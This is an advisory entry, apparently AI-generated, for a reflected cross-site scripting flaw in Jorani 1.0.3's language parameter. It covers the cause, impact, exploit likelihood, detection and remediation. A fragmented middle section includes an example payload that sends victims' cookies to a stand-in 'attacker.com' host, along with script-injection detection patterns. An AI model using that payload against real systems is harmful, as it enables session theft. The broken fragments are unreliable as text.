
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2023-53870 is a reflected cross-site scripting (XSS) vulnerability in Jorani version 1.0.3, affecting the language parameter. It allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in the context of a victim's browser session. The CVE was published on December 15, 2025, and was assigned by VulnCheck. It carries a CVSS v4.0 base score of 5.1 (Medium), as scored by VulnCheck (VulnCheck Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The root cause is insufficient sanitization of user-supplied input in the language parameter, which is reflected back into the HTML response without proper encoding. An attacker can craft a malicious URL containing a JavaScript payload in the language parameter and trick a victim into clicking it; upon loading the page, the browser executes the injected script. No authentication is required to exploit this vulnerability, but active user interaction (victim clicking a crafted link) is necessary (VulnCheck Advisory, Exploit-DB).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, enabling session cookie theft, credential harvesting, phishing via page content manipulation, or redirection to malicious sites. The primary confidentiality impact is low (limited to data accessible within the victim's browser session), with no direct integrity or availability impact on the server. The vulnerability does not provide server-side code execution or direct access to backend systems (VulnCheck Advisory, Red Hat CVE).
A public proof-of-concept exploit is available on Exploit-DB (EDB-51715), lowering the barrier for exploitation (Exploit-DB). The EPSS score is approximately 0.045%, indicating a low but non-zero probability of exploitation in the wild. There is no current evidence of active in-the-wild exploitation, threat actor attribution, or inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires no authentication but does require user interaction (victim must click a crafted link) (VulnCheck Advisory).
language parameter with an XSS payload, e.g., https://target.jorani.instance/path?language=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.language parameter value into the HTML response.<script> tags or JavaScript event handlers observed in web server access logs within the language parameter.language parameter (e.g., containing <script>, javascript:, onerror=, or encoded variants such as %3Cscript%3E).Users should upgrade Jorani beyond version 1.0.3 to a patched release if available, or apply vendor-supplied security patches. As a workaround, implement a Web Application Firewall (WAF) rule to block or sanitize requests containing script injection patterns in the language parameter. Additionally, enforce strict Content Security Policy (CSP) headers on the Jorani application to limit the impact of any reflected XSS. Monitor the Jorani project for official patch releases (VulnCheck Advisory, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."